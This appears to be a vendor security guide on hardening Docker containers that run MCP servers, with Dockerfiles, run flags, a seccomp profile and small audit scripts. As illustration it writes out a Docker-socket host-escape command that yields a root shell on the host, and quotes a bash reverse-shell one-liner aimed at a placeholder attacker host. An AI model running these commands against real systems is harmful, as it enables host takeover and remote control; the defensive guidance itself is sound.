MCP server Docker security — hardening containers for MCP server deployments
Running an MCP server in Docker does not automatically provide security isolation. A container running as root, an unscanned image, missing seccomp or AppArmor profiles, a mounted Docker socket, or a base image with known CVEs can let an exploited tool handler escape the container entirely, or let an attacker who reaches the container gain root-level control of the host.
The root container problem
Docker containers run as UID 0 (root) by default unless the Dockerfile explicitly adds and switches to a non-root user, or the container is started with --user. This default is convenient during development and catastrophic in production. If a vulnerability in an MCP server tool handler (a path traversal, a server-side request forgery that pivots to an internal service, or a deserialization flaw) lets an attacker execute arbitrary code inside the container, that code runs as root inside the container namespace.
With a root container, the blast radius of any code execution vulnerability is significantly wider: root can read and write any file in the container filesystem, open raw sockets to craft network packets (CAP_NET_RAW is in Docker's default capability set), load kernel modules if CAP_SYS_MODULE has been granted, and exploit container escape vulnerabilities that are only reachable from UID 0. Running as a non-root user does not prevent container escapes via kernel exploits, but it closes off the escape techniques that depend on root inside the container and sharply limits what an attacker can do while they remain contained.
# Dockerfile: hardened non-root MCP server (Node.js example)
# Stage 1: install dependencies as root (required for npm ci)
FROM node:20-alpine AS deps
WORKDIR /build
COPY package.json package-lock.json ./
RUN npm ci --ignore-scripts --omit=dev
# Stage 2: production image with non-root user
FROM node:20-alpine AS runner
# Create a non-root system user and group with no home directory
RUN addgroup --system --gid 1001 mcpserver && \
adduser --system --uid 1001 --ingroup mcpserver --no-create-home mcpserver
WORKDIR /app
# Copy built dependencies and application source — owned by non-root user
COPY --from=deps --chown=mcpserver:mcpserver /build/node_modules ./node_modules
COPY --chown=mcpserver:mcpserver src/ ./src/
COPY --chown=mcpserver:mcpserver package.json ./
# Switch to non-root user before the ENTRYPOINT
USER mcpserver
EXPOSE 3000
ENTRYPOINT ["node", "src/index.js"]
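The adduser --no-create-home flag means the server user has no home directory in which an attacker could store tools or configuration. System users created this way on Alpine get /sbin/nologin as their login shell by default, which blocks login-style access (login, su) to the account. That does not remove /bin/sh from the image, however: code running as this user can still exec the BusyBox shell, a gap the distroless approach below closes.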
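A minimal Python sketch of the kind of static check that flags the root-container problem: it finds the last USER directive in the final build stage of a Dockerfile. It is a simplified parser (no ARG substitution, no heredocs), and the function names are illustrative. It treats a stage with no USER as root, which is conservative because some base images set their own default user.

```python
import re
from typing import Optional


def final_stage_user(dockerfile: str) -> Optional[str]:
    """Return the user named by the last USER directive in the final build
    stage, or None if that stage never sets one."""
    # Join backslash line continuations so each instruction sits on one line.
    text = re.sub(r"\\\r?\n", " ", dockerfile)
    user: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines, comments and parser directives
        parts = line.split(None, 1)
        keyword = parts[0].upper()
        argument = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "FROM":
            # A new stage starts; only the last stage ends up in the image.
            user = None
        elif keyword == "USER":
            user = argument
    return user


def runs_as_root(dockerfile: str) -> bool:
    """Conservatively treat a missing USER as root, since that is Docker's
    default unless the base image sets its own user."""
    user = final_stage_user(dockerfile)
    if user is None:
        return True
    name = user.split(":", 1)[0]
    return name in ("root", "0")
```

For example, runs_as_root(open("Dockerfile").read()) should return False for the Dockerfile above, because its final stage ends with USER mcpserver.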
No-new-privileges and read-only filesystem
Two runtime flags significantly reduce what a compromised container can do, at essentially zero application cost for a well-behaved MCP server. --security-opt=no-new-privileges:true prevents any process inside the container from gaining additional privileges through setuid or setcap binaries — an attacker who finds a setuid binary in the container image cannot use it to elevate from the non-root user to root. --read-only mounts the container's root filesystem read-only, preventing an attacker from persisting tools, backdoors, or modified binaries after initial code execution.
# docker run with security hardening flags
# Add --cap-add=NET_BIND_SERVICE only if the server binds to a port below 1024;
# this server listens on 3000, so every capability stays dropped.
# (A comment cannot follow a trailing backslash: it would end the command.)
docker run \
--security-opt=no-new-privileges:true \
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=64m \
--user 1001:1001 \
--cap-drop=ALL \
mcp-server:latest
# Kubernetes equivalent — securityContext in pod spec:
# securityContext:
# runAsNonRoot: true
# runAsUser: 1001
# runAsGroup: 1001
# readOnlyRootFilesystem: true
# allowPrivilegeEscalation: false
# capabilities:
# drop: ["ALL"]
The --tmpfs /tmp mount provides a writable, in-memory temporary directory that the application can use for scratch files. It is mounted with noexec, so binaries written there cannot be executed directly (an interpreter such as node can still read a script from it), and with nosuid, so setuid and setgid bits on files there are ignored. This covers the common case of MCP servers that need to write temporary files during tool execution without giving an attacker a persistent writable filesystem.
Seccomp and AppArmor profiles
Docker's default seccomp profile blocks roughly 44 system calls that applications rarely need but exploits often use, including keyctl, add_key, and request_key (ptrace is blocked only on kernels older than 4.8, and personality is allowed only for specific arguments). For an MCP server whose runtime needs are well defined (outbound HTTP, local filesystem reads and writes, no raw socket access, no process tracing), a custom allowlist profile can be much more restrictive than the Docker default: anything not listed, such as ptrace, mount, and unshare, is denied regardless of which capabilities the container holds.
mcp-server-seccomp.json, an allowlist of only the syscalls an HTTP+filesystem MCP server needs (JSON has no comment syntax, so the file contains just this object):
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_AARCH64"],
  "syscalls": [
    {
      "names": [
        "read", "write", "open", "openat", "close", "stat", "fstat",
        "lstat", "poll", "lseek", "mmap", "mprotect", "munmap", "brk",
        "rt_sigaction", "rt_sigprocmask", "rt_sigreturn", "ioctl",
        "pread64", "pwrite64", "readv", "writev", "access", "pipe",
        "select", "sched_yield", "mremap", "msync", "mincore", "madvise",
        "dup", "dup2", "nanosleep", "getitimer", "alarm", "setitimer",
        "getpid", "sendfile", "socket", "connect", "accept", "sendto",
        "recvfrom", "sendmsg", "recvmsg", "shutdown", "bind", "listen",
        "getsockname", "getpeername", "setsockopt", "getsockopt",
        "clone", "fork", "vfork", "execve", "exit", "wait4", "kill",
        "uname", "fcntl", "flock", "fsync", "fdatasync", "truncate",
        "ftruncate", "getcwd", "chdir", "rename", "mkdir", "rmdir",
        "unlink", "readlink", "chmod", "getuid", "getgid", "getppid",
        "getpgrp", "geteuid", "getegid", "setuid", "setgid",
        "getrlimit", "getrusage", "sysinfo", "times", "gettimeofday",
        "mknod", "statfs", "fstatfs", "futex", "sched_getaffinity",
        "set_tid_address", "clock_gettime", "clock_nanosleep",
        "epoll_create", "epoll_ctl", "epoll_wait", "epoll_pwait",
        "inotify_init", "inotify_add_watch", "inotify_rm_watch",
        "openat2", "statx", "rseq", "getrandom", "memfd_create",
        "exit_group", "set_robust_list", "get_robust_list", "tgkill",
        "arch_prctl", "newfstatat", "epoll_create1", "pipe2", "eventfd2",
        "accept4", "dup3", "getdents64", "prlimit64", "sigaltstack",
        "gettid", "clone3"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
# Apply the custom seccomp profile at runtime
docker run \
--security-opt=seccomp=mcp-server-seccomp.json \
--security-opt=no-new-privileges:true \
mcp-server:latest
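The key exclusions in this profile are ptrace (prevents a compromised process from attaching to other processes and reading their memory), mount (prevents mounting new filesystems, blocking several container escape techniques), and unshare (prevents creating new namespaces). Note that socket and clone are allowed without argument filters, so this profile on its own does not block raw sockets or namespace flags passed to clone; raw packet crafting is instead prevented by dropping CAP_NET_RAW (as --cap-drop=ALL does), and an args filter on socket's address family could tighten the profile further. Test the profile against your specific server before deploying to production: a missing syscall fails with EPERM, which may crash the process or produce silent failures.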
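Two habits help keep a custom profile honest: generating the JSON instead of hand-editing it, and diffing it against the syscalls the server actually makes. A minimal sketch, assuming you already have a list of observed syscall names from tracing the server under a representative workload (for example with strace -f -c); SHOULD_DENY simply collects the syscalls named in this section, and the function names are illustrative:

```python
import json
from typing import Dict, Iterable, List, Set

# Syscalls named in this section as ones an MCP server profile should deny.
SHOULD_DENY = {"ptrace", "mount", "unshare", "keyctl", "add_key"}


def build_profile(allowed: Iterable[str]) -> Dict:
    """Build a deny-by-default Docker seccomp profile as plain data, so it can
    be written with json.dump and never picks up comment lines."""
    return {
        "defaultAction": "SCMP_ACT_ERRNO",
        "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_AARCH64"],
        "syscalls": [{"names": sorted(set(allowed)), "action": "SCMP_ACT_ALLOW"}],
    }


def lint_profile(profile: Dict, observed: Iterable[str]) -> List[str]:
    """Report a permissive default, allowed syscalls from SHOULD_DENY, and
    syscalls seen at runtime that the profile would reject.

    Any SCMP_ACT_ALLOW rule counts as a full allow, even if it carries
    argument filters; this sketch does not evaluate "args"."""
    findings: List[str] = []
    if profile.get("defaultAction") == "SCMP_ACT_ALLOW":
        findings.append("defaultAction allows every unlisted syscall")
    allowed: Set[str] = set()
    for rule in profile.get("syscalls", []):
        if rule.get("action") == "SCMP_ACT_ALLOW":
            allowed.update(rule.get("names", []))
    for name in sorted(allowed & SHOULD_DENY):
        findings.append(f"allows {name}")
    for name in sorted(set(observed) - allowed):
        findings.append(f"missing {name} (observed at runtime)")
    return findings
```

Writing the result with json.dump(build_profile(names), f, indent=2) guarantees the file Docker reads is valid JSON.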
Image provenance and vulnerability scanning
Base image tags are mutable: node:20-alpine today and node:20-alpine next month may point to completely different image layers with different installed packages and different CVE profiles. Pin base images by digest to ensure your builds are reproducible and that a supply-chain attack against the base image does not silently change your production image:
# Unpinned (vulnerable): tag can point to a different image tomorrow
FROM node:20-alpine
# Pinned by digest (safe): immutable reference to a specific image manifest
# <digest> is a placeholder for the 64-hex-digit value reported by
# docker buildx imagetools inspect node:20-alpine
FROM node:20-alpine@sha256:<digest>
# In CI: scan every built image before pushing
- name: Scan image for CVEs
  run: |
    # grype: fail on HIGH or CRITICAL severity CVEs
    grype mcp-server:${{ github.sha }} --fail-on high
    # docker scout (if using Docker Hub)
    docker scout cves mcp-server:${{ github.sha }} \
      --exit-code --only-severity critical,high
Integrate vulnerability scanning into the CI pipeline as a gate: a CRITICAL CVE in the base image should fail the build and block the push to the container registry, the same way a failing test blocks a merge. Schedule weekly re-scans of images already in the registry to catch newly published CVEs against pinned images. Because a pinned digest never picks up upstream fixes on its own, acting on a finding means deliberately bumping the digest and rebuilding.
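Digest pinning is easy to enforce mechanically, in the spirit of a CI gate. A minimal sketch of a Dockerfile check, assuming single-line FROM instructions and no ARG-substituted image names; the function name is illustrative:

```python
import re
from typing import List

# A digest pin is "@sha256:" followed by exactly 64 lowercase hex digits.
_DIGEST = re.compile(r"@sha256:[0-9a-f]{64}$")


def unpinned_base_images(dockerfile: str) -> List[str]:
    """Return FROM images that are not pinned by digest, skipping references
    to earlier build stages and the empty `scratch` image."""
    stage_names = {"scratch"}
    unpinned: List[str] = []
    for raw in dockerfile.splitlines():
        tokens = raw.split()
        if not tokens or tokens[0].upper() != "FROM":
            continue
        # Drop flags such as --platform=linux/amd64.
        args = [t for t in tokens[1:] if not t.startswith("--")]
        if not args:
            continue
        image = args[0]
        if image.lower() not in stage_names and not _DIGEST.search(image):
            unpinned.append(image)
        # Remember "AS <name>" so later "FROM <name>" lines are not flagged.
        if len(args) >= 3 and args[1].upper() == "AS":
            stage_names.add(args[2].lower())
    return unpinned
```

It also rejects a malformed digest, since a sha256 digest must be exactly 64 hex digits long.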
Never mount the Docker socket
Mounting /var/run/docker.sock into a container is a complete privilege escalation path. Any process inside the container can connect to the Docker daemon via the socket and issue API calls to create new containers with --privileged or --pid=host flags — granting full access to the host's process namespace and filesystem. This is not a theoretical risk; it is a well-documented, trivially exploited, one-step host escape:
# The attack — requires only the Docker socket to be mounted:
# Inside the container, any process with access to the socket can run:
docker -H unix:///var/run/docker.sock run \
--privileged \
--pid=host \
--net=host \
-v /:/host \
alpine:latest \
chroot /host /bin/bash
# Result: root shell on the host
# Detection: check if the socket is mounted
docker inspect your-mcp-server-container \
--format '{{range .Mounts}}{{.Source}} -> {{.Destination}}{{println}}{{end}}' \
| grep docker.sock
# Any output here is a critical finding
MCP servers have no legitimate need to control Docker containers. If your MCP server needs to spawn sub-processes for tool execution, use a dedicated sandbox (gVisor, Firecracker microVMs, or a container orchestration service with its own authentication) rather than exposing the Docker socket. If your CI pipeline needs to build or run containers, do that in a separate, isolated build environment such as rootless BuildKit. Note that "Docker-outside-of-Docker" is itself the socket-mounting pattern, so it is not an alternative.
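The docker inspect pipeline above checks one container at a time. A minimal Python sketch that scans docker inspect output for many containers at once (for example, docker inspect $(docker ps -q)); it matches on the socket file name only, so it will not catch a mount of a parent directory such as /var/run:

```python
import json
from typing import List


def docker_socket_mounts(inspect_json: str) -> List[str]:
    """Return one 'container: source -> destination' line per Docker socket
    mount found in `docker inspect` output for one or more containers."""
    hits: List[str] = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "").lstrip("/")
        for mount in container.get("Mounts") or []:
            source = mount.get("Source", "")
            destination = mount.get("Destination", "")
            # Match the socket by file name on either side of the mount; this
            # also catches rootless sockets such as /run/user/1000/docker.sock.
            if source.endswith("docker.sock") or destination.endswith("docker.sock"):
                hits.append(f"{name}: {source} -> {destination}")
    return hits
```

As with the grep version, any returned line is a critical finding.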
Resource limits and PID namespace isolation
An MCP server without resource limits is vulnerable to denial of service via any tool handler that consumes unbounded memory or CPU — whether through a bug, a prompt injection attack, or deliberate abuse. Resource limits also contain the blast radius of a compromised process: a process limited to 512 MB of memory cannot allocate the gigabytes needed for certain memory-based kernel exploits.
# docker run resource limits
# --memory-swap equal to --memory disables swap usage;
# --pids-limit caps the number of processes/threads the container can spawn
docker run \
--memory=512m \
--memory-swap=512m \
--cpus=1.0 \
--pids-limit=128 \
mcp-server:latest
# Kubernetes resource limits: set these in every container spec
# (PID limits are configured per node, via the kubelet's podPidsLimit setting)
# resources:
# requests:
# memory: "128Mi"
# cpu: "250m"
# limits:
# memory: "512Mi"
# cpu: "1000m"
Set --pids-limit to a value slightly above your server's expected thread count. An MCP server handling concurrent tool calls might need 50–100 PIDs. Limiting to 128 prevents fork bombs and limits the attacker's ability to spawn new processes after compromising the container. Never use --pid=host for MCP servers — sharing the host PID namespace gives the container visibility into and (with sufficient privileges) control over all processes on the host.
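To audit limits on containers that are already running, a minimal sketch over docker inspect output. The field names (Memory, MemorySwap, NanoCpus, CpuQuota, PidsLimit under HostConfig) are assumed from the Docker Engine container inspect format, and the messages are illustrative:

```python
import json
from typing import List


def resource_limit_findings(inspect_json: str) -> List[str]:
    """Check the first container in `docker inspect` output for the memory,
    swap, CPU and PID limits described above."""
    host = json.loads(inspect_json)[0].get("HostConfig") or {}
    findings: List[str] = []
    memory = host.get("Memory") or 0            # bytes; 0 means no limit
    memory_swap = host.get("MemorySwap") or 0   # memory + swap; -1 = unlimited
    if memory == 0:
        findings.append("no memory limit (--memory)")
    elif memory_swap != memory:
        # Unset (0) or larger values still let the container use swap.
        findings.append("swap not disabled (set --memory-swap equal to --memory)")
    if not (host.get("NanoCpus") or host.get("CpuQuota")):
        findings.append("no CPU limit (--cpus)")
    pids_limit = host.get("PidsLimit")
    if pids_limit is None or pids_limit <= 0:
        findings.append("no PID limit (--pids-limit)")
    return findings
```

For the docker run example above, --memory=512m appears as Memory and MemorySwap of 536870912 bytes, so the swap check passes.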
Minimal image with distroless
Standard base images, even Alpine, include a shell, a package manager, and a set of basic utilities (GNU coreutils on Debian-based images, BusyBox applets such as wget and tar on Alpine). An attacker who achieves code execution in such a container has a full toolbox for post-exploitation: they can download additional tools, inspect the filesystem interactively, run shell scripts, and pivot to other services. Distroless images contain only the application runtime and its direct dependencies, with no shell, package manager, or debugging tools:
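# Multi-stage build: install dependencies in a full image, deploy in distroless.
# The builder uses Debian 12 (bookworm) so any prebuilt native modules match
# the glibc-based distroless runtime (an Alpine/musl builder would not).
FROM node:20-bookworm-slim AS builder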
WORKDIR /build
COPY package.json package-lock.json ./
RUN npm ci --ignore-scripts --omit=dev
COPY src/ ./src/
# Final stage: distroless Node.js — no shell, no package manager
FROM gcr.io/distroless/nodejs20-debian12
# Pin the distroless image by digest in production
# FROM gcr.io/distroless/nodejs20-debian12@sha256:abc123...
WORKDIR /app
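COPY --from=builder --chown=nonroot:nonroot /build/node_modules ./node_modules
COPY --from=builder --chown=nonroot:nonroot /build/src ./src
COPY --from=builder --chown=nonroot:nonroot /build/package.json ./
# Distroless includes a 'nonroot' user at UID 65532.
# (Dockerfile comments must start the line; a trailing "# ..." after USER
# would be read as part of the user name.)
USER nonroot
EXPOSE 3000
CMD ["src/index.js"]
# Note: the distroless Node.js image sets ENTRYPOINT to its node binary,
# so CMD supplies only the script path.
# With no /bin/sh in the image, only exec-form (JSON array) CMD and ENTRYPOINT
# work; a shell-form CMD would fail to start.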
Without a shell, an attacker who achieves remote code execution cannot run sh -c "curl ..." or bash -i >& /dev/tcp/attacker/4444 0>&1. They must operate through the Node.js runtime itself — significantly raising the skill and effort required for post-exploitation. Combine distroless with a read-only filesystem and seccomp profile for a layered defense that makes the container a genuine isolation boundary rather than a thin wrapper.
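One way to confirm a distroless image really ships without a shell is to scan its filesystem. docker export streams a container's filesystem as a tar archive, so a minimal sketch can read that stream directly; the list of shell paths is an assumption and not exhaustive, and the function names are illustrative:

```python
import posixpath
import tarfile
from typing import IO, Iterable, List

# Shell and multi-call binaries to look for (an assumed, non-exhaustive list).
# busybox/sh is where distroless ":debug" images place their shell.
SHELL_PATHS = {
    "bin/sh", "bin/bash", "bin/ash", "bin/dash", "bin/busybox",
    "usr/bin/sh", "usr/bin/bash", "usr/bin/dash", "busybox/sh",
}


def find_shells(paths: Iterable[str]) -> List[str]:
    """Return the normalized paths that match a known shell location."""
    normalized = (posixpath.normpath(p).lstrip("/") for p in paths)
    return sorted({p for p in normalized if p in SHELL_PATHS})


def shells_in_export(fileobj: IO[bytes]) -> List[str]:
    """Scan a `docker export` tar stream (e.g. sys.stdin.buffer) for shells."""
    with tarfile.open(fileobj=fileobj, mode="r|*") as tar:
        return find_shells(member.name for member in tar)
```

For example, after docker create --name probe mcp-server:latest, run docker export probe | python3 check_shells.py, where the hypothetical check_shells.py prints shells_in_export(sys.stdin.buffer). An Alpine-based image reports entries such as bin/sh and bin/busybox; a distroless image should report nothing.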
What SkillAudit checks
- container-runs-as-root: the Dockerfile does not include a USER directive, meaning the MCP server process runs as UID 0 inside the container, maximizing the impact of any code execution vulnerability.
- no-seccomp-profile: the container is run without a custom seccomp profile, relying on Docker's default (which allows many syscalls unnecessary for an HTTP-based MCP server) or with seccomp disabled entirely.
- docker-socket-mounted: /var/run/docker.sock is mounted into the MCP server container, providing a complete host escape path to any code running in the container.
- unpinned-base-image-digest: the Dockerfile references a base image by tag without a digest pin, meaning the build is not reproducible and is vulnerable to base image substitution attacks.
- no-resource-limits: the container is started without memory, CPU, or PID limits, leaving the host vulnerable to denial of service from a misbehaving or compromised tool handler.
SkillAudit inspects your Dockerfile for USER directives and base image digest pins, analyzes your container orchestration configuration for security context settings and resource limits, checks for Docker socket volume mounts, and verifies that seccomp profiles are present and correctly structured for the MCP server's actual syscall requirements.
Check your Dockerized MCP server for container escape vectors.